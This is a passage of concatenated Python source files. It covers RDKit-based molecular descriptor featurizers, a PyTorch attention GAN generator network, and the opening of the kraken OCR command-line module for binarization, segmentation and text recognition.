apol += atom_pols[1] * atom.GetTotalNumHs(includeNeighbors=False)
res += apol
else:
raise ValueError(f"atomic number {anum} not found")
return res
d = d + (
calc_aromatic_bonds(mol),
calc_acid_groups(mol),
calc_basic_groups(mol),
calc_apol(mol),
)
return d
def classic_featurizer(smiles):
names = tuple(
[
"number of hydrogen bond donor",
"number of hydrogen bond acceptor",
"Wildman-Crippen LogP",
"number of heteroatoms",
"ring count",
"number of rotatable bonds",
"aromatic bonds count",
"acidic group count",
"basic group count",
"atomic polarizability",
]
)
mols = [Chem.MolFromSmiles(smi) for smi in smiles]
R = []
cols = None
for m in mols:
descriptors = _calculate_rdkit_descriptors(m)
descriptor_names = names
descriptors = Descriptors(
descriptor_type="Classic",
descriptors=descriptors,
descriptor_names=descriptor_names,
)
R += [list(descriptors.descriptors)]
if cols is None:
cols = list(descriptors.descriptor_names)
data = pd.DataFrame(R, columns=cols)
return data
class ClassicDescriptor(object):
def __init__(self):
self.nan_filter = NanFilter()
self.imputer = Imputer()
self.variance_filter = VarianceFilter()
self.scaler = Scaler()
def fit(self, smiles):
df = classic_featurizer(smiles)
X = np.array(df, dtype=np.float32)
self.nan_filter.fit(X)
X = self.nan_filter.transform(X)
self.imputer.fit(X)
X = self.imputer.transform(X)
self.variance_filter.fit(X)
X = self.variance_filter.transform(X)
self.scaler.fit(X)
X = self.scaler.transform(X)
self.features = list(df.columns)
self.features = [self.features[i] for i in self.nan_filter.col_idxs]
self.features = [self.features[i] for i in self.variance_filter.col_idxs]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
df = classic_featurizer(smiles)
X = np.array(df, dtype=np.float32)
X = self.nan_filter.transform(X)
X = self.imputer.transform(X)
X = self.variance_filter.transform(X)
X = self.scaler.transform(X)
return pd.DataFrame(X, columns=self.features)
# MORGAN FINGERPRINTS
from rdkit.Chem import rdMolDescriptors as rd
from rdkit import Chem
RADIUS = 3
NBITS = 2048
DTYPE = np.uint8
def clip_sparse(vect, nbits):
l = [0]*nbits
for i,v in vect.GetNonzeroElements().items():
l[i] = v if v < 255 else 255
return l
class _MorganDescriptor(object):
def __init__(self):
self.nbits = NBITS
self.radius = RADIUS
def calc(self, mol):
v = rd.GetHashedMorganFingerprint(mol, radius=self.radius, nBits=self.nbits)
return clip_sparse(v, self.nbits)
def morgan_featurizer(smiles):
d = _MorganDescriptor()
X = np.zeros((len(smiles), NBITS))
for i, smi in enumerate(smiles):
mol = Chem.MolFromSmiles(smi)
X[i,:] = d.calc(mol)
return X
class MorganDescriptor(object):
def __init__(self):
pass
def fit(self, smiles):
X = morgan_featurizer(smiles)
self.features = ["fp-{0}".format(i) for i in range(X.shape[1])]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
X = morgan_featurizer(smiles)
return pd.DataFrame(X, columns=self.features)
# RDKIT 200 Descriptors
from rdkit.Chem import Descriptors as RdkitDescriptors
from rdkit import Chem
RDKIT_PROPS = {"1.0.0": ['BalabanJ', 'BertzCT', 'Chi0', 'Chi0n', 'Chi0v', 'Chi1', 'Chi1n',
'Chi1v', 'Chi2n', 'Chi2v', 'Chi3n', 'Chi3v', 'Chi4n', 'Chi4v',
'EState_VSA1', 'EState_VSA10', 'EState_VSA11', 'EState_VSA2',
'EState_VSA3', 'EState_VSA4', 'EState_VSA5', 'EState_VSA6',
'EState_VSA7', 'EState_VSA8', 'EState_VSA9', 'ExactMolWt',
'FpDensityMorgan1', 'FpDensityMorgan2', 'FpDensityMorgan3',
'FractionCSP3', 'HallKierAlpha', 'HeavyAtomCount', 'HeavyAtomMolWt',
'Ipc', 'Kappa1', 'Kappa2', 'Kappa3', 'LabuteASA', 'MaxAbsEStateIndex',
'MaxAbsPartialCharge', 'MaxEStateIndex', 'MaxPartialCharge',
'MinAbsEStateIndex', 'MinAbsPartialCharge', 'MinEStateIndex',
'MinPartialCharge', 'MolLogP', 'MolMR', 'MolWt', 'NHOHCount',
'NOCount', 'NumAliphaticCarbocycles', 'NumAliphaticHeterocycles',
'NumAliphaticRings', 'NumAromaticCarbocycles', 'NumAromaticHeterocycles',
'NumAromaticRings', 'NumHAcceptors', 'NumHDonors', 'NumHeteroatoms',
'NumRadicalElectrons', 'NumRotatableBonds', 'NumSaturatedCarbocycles',
'NumSaturatedHeterocycles', 'NumSaturatedRings', 'NumValenceElectrons',
'PEOE_VSA1', 'PEOE_VSA10', 'PEOE_VSA11', 'PEOE_VSA12', 'PEOE_VSA13',
'PEOE_VSA14', 'PEOE_VSA2', 'PEOE_VSA3', 'PEOE_VSA4', 'PEOE_VSA5',
'PEOE_VSA6', 'PEOE_VSA7', 'PEOE_VSA8', 'PEOE_VSA9', 'RingCount',
'SMR_VSA1', 'SMR_VSA10', 'SMR_VSA2', 'SMR_VSA3', 'SMR_VSA4', 'SMR_VSA5',
'SMR_VSA6', 'SMR_VSA7', 'SMR_VSA8', 'SMR_VSA9', 'SlogP_VSA1', 'SlogP_VSA10',
'SlogP_VSA11', 'SlogP_VSA12', 'SlogP_VSA2', 'SlogP_VSA3', 'SlogP_VSA4',
'SlogP_VSA5', 'SlogP_VSA6', 'SlogP_VSA7', 'SlogP_VSA8', 'SlogP_VSA9',
'TPSA', 'VSA_EState1', 'VSA_EState10', 'VSA_EState2', 'VSA_EState3',
'VSA_EState4', 'VSA_EState5', 'VSA_EState6', 'VSA_EState7', 'VSA_EState8',
'VSA_EState9', 'fr_Al_COO', 'fr_Al_OH', 'fr_Al_OH_noTert', 'fr_ArN',
'fr_Ar_COO', 'fr_Ar_N', 'fr_Ar_NH', 'fr_Ar_OH', 'fr_COO', 'fr_COO2',
'fr_C_O', 'fr_C_O_noCOO', 'fr_C_S', 'fr_HOCCN', 'fr_Imine', 'fr_NH0',
'fr_NH1', 'fr_NH2', 'fr_N_O', 'fr_Ndealkylation1', 'fr_Ndealkylation2',
'fr_Nhpyrrole', 'fr_SH', 'fr_aldehyde', 'fr_alkyl_carbamate', 'fr_alkyl_halide',
'fr_allylic_oxid', 'fr_amide', 'fr_amidine', 'fr_aniline', 'fr_aryl_methyl',
'fr_azide', 'fr_azo', 'fr_barbitur', 'fr_benzene', 'fr_benzodiazepine',
'fr_bicyclic', 'fr_diazo', 'fr_dihydropyridine', 'fr_epoxide', 'fr_ester',
'fr_ether', 'fr_furan', 'fr_guanido', 'fr_halogen', 'fr_hdrzine', 'fr_hdrzone',
'fr_imidazole', 'fr_imide', 'fr_isocyan', 'fr_isothiocyan', 'fr_ketone',
'fr_ketone_Topliss', 'fr_lactam', 'fr_lactone', 'fr_methoxy', 'fr_morpholine',
'fr_nitrile', 'fr_nitro', 'fr_nitro_arom', 'fr_nitro_arom_nonortho',
'fr_nitroso', 'fr_oxazole', 'fr_oxime', 'fr_para_hydroxylation', 'fr_phenol',
'fr_phenol_noOrthoHbond', 'fr_phos_acid', 'fr_phos_ester', 'fr_piperdine',
'fr_piperzine', 'fr_priamide', 'fr_prisulfonamd', 'fr_pyridine', 'fr_quatN',
'fr_sulfide', 'fr_sulfonamd', 'fr_sulfone', 'fr_term_acetylene', 'fr_tetrazole',
'fr_thiazole', 'fr_thiocyan', 'fr_thiophene', 'fr_unbrch_alkane', 'fr_urea', 'qed']
}
CURRENT_VERSION = "1.0.0"
class _RdkitDescriptor(object):
def __init__(self):
self.properties = RDKIT_PROPS[CURRENT_VERSION]
self._funcs = {name: func for name, func in RdkitDescriptors.descList}
def calc(self, mols):
R = []
for mol in mols:
if mol is None:
r = [np.nan]*len(self.properties)
else:
r = []
for prop in self.properties:
r += [self._funcs[prop](mol)]
R += [r]
return np.array(R)
def rdkit_featurizer(smiles):
d = _RdkitDescriptor()
mols = [Chem.MolFromSmiles(smi) for smi in smiles]
X = d.calc(mols)
data = pd.DataFrame(X, columns=d.properties)
return data
class RdkitDescriptor(object):
def __init__(self):
self.nan_filter = NanFilter()
self.imputer = Imputer()
self.variance_filter = VarianceFilter()
self.scaler = Scaler()
def fit(self, smiles):
df = rdkit_featurizer(smiles)
X = np.array(df, dtype=np.float32)
self.nan_filter.fit(X)
X = self.nan_filter.transform(X)
self.imputer.fit(X)
X = self.imputer.transform(X)
self.variance_filter.fit(X)
X = self.variance_filter.transform(X)
self.scaler.fit(X)
X = self.scaler.transform(X)
self.features = list(df.columns)
self.features = [self.features[i] for i in self.nan_filter.col_idxs]
self.features = [self.features[i] for i in self.variance_filter.col_idxs]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
df = rdkit_featurizer(smiles)
X = np.array(df, dtype=np.float32)
X = self.nan_filter.transform(X)
X = self.imputer.transform(X)
X = self.variance_filter.transform(X)
X = self.scaler.transform(X)
return pd.DataFrame(X, columns=self.features)
# MACCS DESCRIPTORS
def maccs_featurizer(smiles):
mols = [Chem.MolFromSmiles(smi) for smi in smiles]
mk = os.path.join(DATA_PATH, "MACCSkeys.txt")
with open(str(mk), "r") as f:
names = tuple([x.strip().split("\t")[-1] for x in f.readlines()[1:]])
R = []
cols = None
for m in mols:
# rdkit sets fps[0] to 0 and starts keys at 1!
fps = list(MACCSkeys.GenMACCSKeys(m).ToBitString())[1:] # ersilia edit
descriptors = tuple(int(i) for i in fps)
descriptor_names = names
descriptors = Descriptors(
descriptor_type="MACCS",
descriptors=descriptors,
descriptor_names=descriptor_names,
)
R += [list(descriptors.descriptors)]
if cols is None:
cols = list(descriptors.descriptor_names)
data = pd.DataFrame(R, columns=cols)
return data
class MaccsDescriptor(object):
def __init__(self):
pass
def fit(self, smiles):
return maccs_featurizer(smiles)
def transform(self, smiles):
return maccs_featurizer(smiles)
|
nilq/baby-python
|
python
|
import torch.nn as nn
import functools
import torch
import functools
import torch.nn.functional as F
from torch.autograd import Variable
import math
import torchvision
class Bottleneck(nn.Module):
# expansion = 4
def __init__(self, inplanes, outplanes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, int(inplanes/4), kernel_size=1, bias=False)
self.bn1 = nn.InstanceNorm2d(int(inplanes/4))
self.conv2 = nn.Conv2d(int(inplanes/4), int(inplanes/4), kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.InstanceNorm2d(int(inplanes/4))
self.conv3 = nn.Conv2d(int(inplanes/4), outplanes, kernel_size=1, bias=False)
self.bn3 = nn.InstanceNorm2d(outplanes)
self.relu = nn.LeakyReLU(inplace=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += residual
out = self.relu(out)
return out
class ASBlock(nn.Module):
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False):
super(ASBlock, self).__init__()
self.conv_block_stream1 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=False)
self.conv_block_stream2 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=True, cated_stream2=cated_stream2)
self.channel_switch = nn.Conv2d(dim * 2, dim, kernel_size=1, padding=0, bias=False)
self.channel_switch_N = nn.InstanceNorm2d(dim)
self.channel_switch_A = nn.LeakyReLU(True)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False, cal_att=False):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim*2, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim*2),
nn.ReLU(True)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
nn.ReLU(True)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cal_att:
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x1, x2):
x1_out = self.conv_block_stream1(x1)
x2_out = self.conv_block_stream2(x2)
att = F.sigmoid(x2_out)
x1_out = torch.cat([x1_out ,att],1)
x1_out = self.channel_switch(x1_out)
x1_out = self.channel_switch_N(x1_out)
x1_out_after = self.channel_switch_A(x1_out)
out = x1 + x1_out_after # residual connection
# stream2 receive feedback from stream1
x2_out = torch.cat((x2_out, out), 1)
return out, x2_out, x1, x1_out_after
class ASNModel(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.InstanceNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
assert(n_blocks >= 0 and type(input_nc) == list)
super(ASNModel, self).__init__()
self.input_nc_s1 = input_nc[0]
self.input_nc_s2 = input_nc[1]
self.output_nc = output_nc
self.ngf = ngf
self.gpu_ids = gpu_ids
self.model_stream1_down_Reflect = nn.ReflectionPad2d(3)
self.model_stream1_down_Con1 = nn.Conv2d(self.input_nc_s1, 64, kernel_size=7, padding=0, bias=False)
self.model_stream1_down_N1 = nn.InstanceNorm2d(64)
self.model_stream1_down_A1 = nn.LeakyReLU(True)
self.model_stream2_down_Reflect = nn.ReflectionPad2d(3)
self.model_stream2_down_Con1 = nn.Conv2d(self.input_nc_s2, 64, kernel_size=7, padding=0,
bias=False)
self.model_stream2_down_N1 = nn.InstanceNorm2d(64)
self.model_stream2_down_A1 = nn.LeakyReLU(True)
self.model_stream1_down_Con2 = nn.Conv2d(64 ,128, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream1_down_N2 = nn.InstanceNorm2d(128)
self.model_stream1_down_A2 = nn.LeakyReLU(True)
self.model_stream2_down_Con2 = nn.Conv2d(64 , 128, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream2_down_N2 = nn.InstanceNorm2d(128)
self.model_stream2_down_A2 = nn.LeakyReLU(True)
self.model_stream1_down_Con3 = nn.Conv2d(128, 256, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream1_down_N3 = nn.InstanceNorm2d(256)
self.model_stream1_down_A3 = nn.LeakyReLU(True)
self.model_stream2_down_Con3 = nn.Conv2d(128, 256, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream2_down_N3 = nn.InstanceNorm2d(256)
self.model_stream2_down_A3 = nn.LeakyReLU(True)
self.model_stream1_down_Con4 = nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False)
self.model_stream1_down_N4 = nn.InstanceNorm2d(512)
self.model_stream1_down_A4 = nn.LeakyReLU(True)
self.model_stream2_down_Con4 = nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False)
self.model_stream2_down_N4 = nn.InstanceNorm2d(512)
self.model_stream2_down_A4 = nn.LeakyReLU(True)
cated_stream2 = [True for i in range(4)]
cated_stream2[0] = False
asBlock = nn.ModuleList()
for i in range(4):
asBlock.append(ASBlock(512, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout, use_bias=False, cated_stream2=cated_stream2[i]))
self.layer0 = self._make_layer(2, 1024, 1024)
self.model_stream1_up_Con0_rgb = nn.ConvTranspose2d(1024, 3, kernel_size=3, stride=1, padding=1, bias=False)
self.model_stream1_up_A0_rgb = nn.Tanh()
self.model_stream1_up_Con0 = nn.ConvTranspose2d(1024, 512, kernel_size=3, stride=2, padding=1, output_padding=1, bias=False)
self.model_stream1_up_N0 = nn.InstanceNorm2d(512)
self.model_stream1_up_A0 = nn.ReLU(True)
self.layer1 = self._make_layer(2, 771, 771)
self.model_stream1_up_Con1_rgb = nn.ConvTranspose2d(771, 3, kernel_size=3, stride=1, padding=1, bias=False)
self.model_stream1_up_A1_rgb = nn.Tanh()
self.model_stream1_up_Con1 = nn.ConvTranspose2d(771, 256, kernel_size=3, stride=2, padding=1, output_padding=1, bias=False)
self.model_stream1_up_N1 = nn.InstanceNorm2d(256)
self.model_stream1_up_A1 = nn.ReLU(True)
self.layer2 = self._make_layer(2, 387, 387)
self.model_stream1_up_Con2_rgb = nn.ConvTranspose2d(387, 3, kernel_size=3, stride=1, padding=1, bias=False)
self.model_stream1_up_A1_rgb = nn.Tanh()
self.model_stream1_up_Con2 = nn.ConvTranspose2d(387 , 128, kernel_size=3, stride=2, padding=1, output_padding=1, bias=False)
self.model_stream1_up_N2 = nn.InstanceNorm2d(128)
self.model_stream1_up_A2 = nn.ReLU(True)
self.model_stream1_up_Reflect = nn.ReflectionPad2d(1)
self.model_stream1_up_Con3 = nn.Conv2d(128 , 3, kernel_size=3, padding=0, bias=False)
self.model_stream1_up_A3 = nn.Tanh()
self.model_stream1_up_Con5 = nn.Conv2d(6 , 3, kernel_size=1, padding=0, bias=False)
self.model_stream1_up_A5 = nn.Tanh()
self.asBlock = asBlock
def _make_layer(self, block, planes, outplanes):
layers = []
layers.append(Bottleneck(planes, outplanes))
for i in range(1, block):
layers.append(Bottleneck(outplanes, outplanes))
return nn.Sequential(*layers)
def weights_init_kaiming(self, m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out')
nn.init.constant_(m.bias, 0.0)
elif classname.find('Conv') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
elif classname.find('BatchNorm') != -1:
if m.affine:
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0.0)
def weights_init_classifier(self, m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.normal_(m.weight, std=0.001)
if m.bias:
nn.init.constant_(m.bias, 0.0)
def forward(self, input):
x1, x2 = input
# eye, nose, mouth are for TP-GAN
# Down Sampling
x1 = self.model_stream1_down_Reflect(x1)
x1 = self.model_stream1_down_Con1(x1)
x1 = self.model_stream1_down_N1(x1)
x1 = self.model_stream1_down_A1(x1)
x2 = self.model_stream2_down_Reflect(x2)
x2 = self.model_stream2_down_Con1(x2)
x2 = self.model_stream2_down_N1(x2)
x2 = self.model_stream2_down_A1(x2)
x1 = self.model_stream1_down_Con2(x1)
x1 = self.model_stream1_down_N2(x1)
x1 = self.model_stream1_down_A2(x1)
x2 = self.model_stream2_down_Con2(x2)
x2 = self.model_stream2_down_N2(x2)
x2 = self.model_stream2_down_A2(x2)
x_64 = x1
x1 = self.model_stream1_down_Con3(x1)
x1 = self.model_stream1_down_N3(x1)
x1 = self.model_stream1_down_A3(x1)
x2 = self.model_stream2_down_Con3(x2)
x2 = self.model_stream2_down_N3(x2)
x2 = self.model_stream2_down_A3(x2)
x_32 = x1
x1 = self.model_stream1_down_Con4(x1)
x1 = self.model_stream1_down_N4(x1)
x1 = self.model_stream1_down_A4(x1)
x_16 = x1
x2 = self.model_stream2_down_Con4(x2)
x2 = self.model_stream2_down_N4(x2)
x2 = self.model_stream2_down_A4(x2)
# AS-Block
att = torch.sigmoid(x2)
x1_out = x1 * att
x1 = x1 + x1_out
before_list = []
after_list =[]
for model in self.asBlock:
x1, x2, x1_before, x1_after = model(x1, x2)
before_list.append(x1_before)
after_list.append(x1_after)
x1 = torch.cat([x1 ,x_16],1)
x1 = self.layer0(x1)
fake_16 = self.model_stream1_up_Con0_rgb(x1)
fake_16 = self.model_stream1_up_A0_rgb(fake_16)
fake_16_32 = torch.nn.functional.upsample(fake_16,(32,32),mode='bilinear')
x1 = self.model_stream1_up_Con0(x1)
x1 = self.model_stream1_up_N0(x1)
x1 = self.model_stream1_up_A0(x1)
x1 = torch.cat([x1 ,x_32],1)
x1 = torch.cat([x1 ,fake_16_32],1)
x1 = self.layer1(x1)
fake_32 = self.model_stream1_up_Con1_rgb(x1)
fake_32 = self.model_stream1_up_A0_rgb(fake_32)
fake_32_64 = torch.nn.functional.upsample(fake_32,(64,64),mode='bilinear')
x1 = self.model_stream1_up_Con1(x1)
x1 = self.model_stream1_up_N1(x1)
x1 = self.model_stream1_up_A1(x1)
x1 = torch.cat([x1 ,x_64],1)
x1 = torch.cat([x1 ,fake_32_64],1)
x1 = self.layer2(x1)
fake_64 = self.model_stream1_up_Con2_rgb(x1)
fake_64 = self.model_stream1_up_A0_rgb(fake_64)
fake_64_128 = torch.nn.functional.upsample(fake_64,(128,128),mode='bilinear')
x1 = self.model_stream1_up_Con2(x1)
x1 = self.model_stream1_up_N2(x1)
x1 = self.model_stream1_up_A2(x1)
x1 = self.model_stream1_up_Reflect(x1)
x1 = self.model_stream1_up_Con3(x1)
x1 = self.model_stream1_up_A3(x1)
x1 = torch.cat([x1 ,fake_64_128],1)
x1 = self.model_stream1_up_Con5(x1)
x1 = self.model_stream1_up_A5(x1)
return x1, fake_64, fake_32, fake_16, before_list, after_list
class ASNetwork(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
super(ASNetwork, self).__init__()
assert type(input_nc) == list and len(input_nc) == 2, 'The AttModule take input_nc in format of list only!!'
self.gpu_ids = gpu_ids
self.model = ASNModel(input_nc, output_nc, ngf, norm_layer, use_dropout, n_blocks, gpu_ids, padding_type, n_downsampling=n_downsampling)
def forward(self, input):
if self.gpu_ids and isinstance(input[0].data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 Benjamin Kiessling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
kraken.kraken
~~~~~~~~~~~~~
Command line drivers for recognition functionality.
"""
import os
import warnings
import logging
from typing import Dict, Union, List, cast, Any, IO
from functools import partial
from PIL import Image
import click
from click import open_file
from kraken.lib import log
warnings.simplefilter('ignore', UserWarning)
logger = logging.getLogger('kraken')
APP_NAME = 'kraken'
DEFAULT_MODEL = ['en-default.mlmodel']
LEGACY_MODEL_DIR = '/usr/local/share/ocropus'
def message(msg: str, **styles) -> None:
if logger.getEffectiveLevel() >= 30:
click.secho(msg, **styles)
def binarizer(threshold, zoom, escale, border, perc, range, low, high, base_image, input, output) -> None:
from kraken import binarization
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
message('Binarizing\t', nl=False)
try:
res = binarization.nlbin(im, threshold, zoom, escale, border, perc, range,
low, high)
form = None
ext = os.path.splitext(output)[1]
if ext in ['.jpg', '.jpeg', '.JPG', '.JPEG', '']:
form = 'png'
if ext:
logger.warning('jpeg does not support 1bpp images. Forcing to png.')
res.save(output, format=form)
except Exception:
message('\u2717', fg='red')
raise
message('\u2713', fg='green')
def segmenter(text_direction, script_detect, allowed_scripts, scale,
maxcolseps, black_colseps, remove_hlines, pad, mask, base_image, input,
output) -> None:
import json
from kraken import pageseg
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
if mask:
try:
mask = Image.open(mask)
except IOError as e:
raise click.BadParameter(str(e))
message('Segmenting\t', nl=False)
try:
res = pageseg.segment(im, text_direction, scale, maxcolseps, black_colseps, no_hlines=remove_hlines, pad=pad, mask=mask)
if script_detect:
res = pageseg.detect_scripts(im, res, valid_scripts=allowed_scripts)
except Exception:
message('\u2717', fg='red')
raise
with open_file(output, 'w') as fp:
fp = cast(IO[Any], fp)
json.dump(res, fp)
message('\u2713', fg='green')
def recognizer(model, pad, no_segmentation, bidi_reordering, script_ignore, base_image, input, output, lines) -> None:
import json
import tempfile
from kraken import rpred
try:
im = Image.open(base_image)
except IOError as e:
raise click.BadParameter(str(e))
ctx = click.get_current_context()
# input may either be output from the segmenter then it is a JSON file or
# be an image file when running the OCR subcommand alone. might still come
# from some other subcommand though.
scripts = set()
if not lines and base_image != input:
lines = input
if not lines:
if no_segmentation:
lines = tempfile.NamedTemporaryFile(mode='w', delete=False)
logger.info('Running in no_segmentation mode. Creating temporary segmentation {}.'.format(lines.name))
json.dump({'script_detection': False,
'text_direction': 'horizontal-lr',
'boxes': [(0, 0) + im.size]}, lines)
lines.close()
lines = lines.name
else:
raise click.UsageError('No line segmentation given. Add one with `-l` or run `segment` first.')
elif no_segmentation:
logger.warning('no_segmentation mode enabled but segmentation defined. Ignoring --no-segmentation option.')
with open_file(lines, 'r') as fp:
try:
fp = cast(IO[Any], fp)
bounds = json.load(fp)
except ValueError as e:
raise click.UsageError('{} invalid segmentation: {}'.format(lines, str(e)))
# script detection
if bounds['script_detection']:
for l in bounds['boxes']:
for t in l:
scripts.add(t[0])
it = rpred.mm_rpred(model, im, bounds, pad,
bidi_reordering=bidi_reordering,
script_ignore=script_ignore)
else:
it = rpred.rpred(model['default'], im, bounds, pad,
bidi_reordering=bidi_reordering)
if not lines and no_segmentation:
logger.debug('Removing temporary segmentation file.')
os.unlink(lines.name)
preds = []
with log.progressbar(it, label='Processing', length=len(bounds['boxes'])) as bar:
for pred in bar:
preds.append(pred)
ctx = click.get_current_context()
with open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
message('Writing recognition results for {}\t'.format(base_image), nl=False)
logger.info('Serializing as {} into {}'.format(ctx.meta['mode'], output))
if ctx.meta['mode'] != 'text':
from kraken import serialization
fp.write(serialization.serialize(preds, base_image,
Image.open(base_image).size,
ctx.meta['text_direction'],
scripts,
ctx.meta['mode']))
else:
fp.write('\n'.join(s.prediction for s in preds))
message('\u2713', fg='green')
@click.group(chain=True)
@click.version_option()
@click.option('-i', '--input', type=(click.Path(exists=True), # type: ignore
click.Path(writable=True)), multiple=True,
help='Input-output file pairs. Each input file (first argument) is mapped to one '
'output file (second argument), e.g. `-i input.png output.txt`')
@click.option('-I', '--batch-input', multiple=True, help='Glob expression to add multiple files at once.')
@click.option('-o', '--suffix', help='Suffix for output files from batch inputs.')
@click.option('-v', '--verbose', default=0, count=True, show_default=True)
@click.option('-d', '--device', default='cpu', show_default=True, help='Select device to use (cpu, cuda:0, cuda:1, ...)')
def cli(input, batch_input, suffix, verbose, device):
"""
Base command for recognition functionality.
Inputs are defined as one or more pairs `-i input_file output_file`
followed by one or more chainable processing commands. Likewise, verbosity
is set on all subcommands with the `-v` switch.
"""
ctx = click.get_current_context()
ctx.meta['device'] = device
log.set_logger(logger, level=30-min(10*verbose, 20))
@cli.resultcallback()
def process_pipeline(subcommands, input, batch_input, suffix, **args):
"""
Helper function calling the partials returned by each subcommand and
placing their respective outputs in temporary files.
"""
import glob
import tempfile
input = list(input)
if batch_input and suffix:
for batch_expr in batch_input:
for in_file in glob.glob(batch_expr, recursive=True):
input.append((in_file, '{}{}'.format(os.path.splitext(in_file)[0], suffix)))
for io_pair in input:
try:
base_image = io_pair[0]
fc = [io_pair[0]] + [tempfile.mkstemp()[1] for cmd in subcommands[1:]] + [io_pair[1]]
for task, input, output in zip(subcommands, fc, fc[1:]):
task(base_image=base_image, input=input, output=output)
base_image = input
finally:
for f in fc[1:-1]:
os.unlink(f)
@cli.command('binarize')
@click.option('--threshold', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--zoom', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--escale', show_default=True, default=1.0, type=click.FLOAT)
@click.option('--border', show_default=True, default=0.1, type=click.FLOAT)
@click.option('--perc', show_default=True, default=80, type=click.IntRange(1, 100))
@click.option('--range', show_default=True, default=20, type=click.INT)
@click.option('--low', show_default=True, default=5, type=click.IntRange(1, 100))
@click.option('--high', show_default=True, default=90, type=click.IntRange(1, 100))
def binarize(threshold, zoom, escale, border, perc, range, low, high):
"""
Binarizes page images.
"""
return partial(binarizer, threshold, zoom, escale, border, perc, range, low, high)
@cli.command('segment')
@click.option('-d', '--text-direction', default='horizontal-lr',
show_default=True,
type=click.Choice(['horizontal-lr', 'horizontal-rl',
'vertical-lr', 'vertical-rl']),
help='Sets principal text direction')
@click.option('-s/-n', '--script-detect/--no-script-detect', default=False,
show_default=True,
help='Enable script detection on segmenter output')
@click.option('-a', '--allowed-scripts', default=None, multiple=True,
show_default=True,
help='List of allowed scripts in script detection output. Ignored if disabled.')
@click.option('--scale', show_default=True, default=None, type=click.FLOAT)
@click.option('-m', '--maxcolseps', show_default=True, default=2, type=click.INT)
@click.option('-b/-w', '--black-colseps/--white_colseps', show_default=True, default=False)
@click.option('-r/-l', '--remove_hlines/--hlines', show_default=True, default=True)
@click.option('-p', '--pad', show_default=True, type=(int, int), default=(0, 0),
help='Left and right padding around lines')
@click.option('-m', '--mask', show_default=True, default=None,
type=click.File(mode='rb', lazy=True), help='Segmentation mask '
'suppressing page areas for line detection. 0-valued image '
'regions are ignored for segmentation purposes. Disables column '
'detection.')
def segment(text_direction, script_detect, allowed_scripts, scale, maxcolseps,
black_colseps, remove_hlines, pad, mask):
"""
Segments page images into text lines.
"""
return partial(segmenter, text_direction, script_detect, allowed_scripts,
scale, maxcolseps, black_colseps, remove_hlines, pad, mask)
def _validate_mm(ctx, param, value):
model_dict = {'ignore': []} # type: Dict[str, Union[str, List[str]]]
if len(value) == 1 and len(value[0].split(':')) == 1:
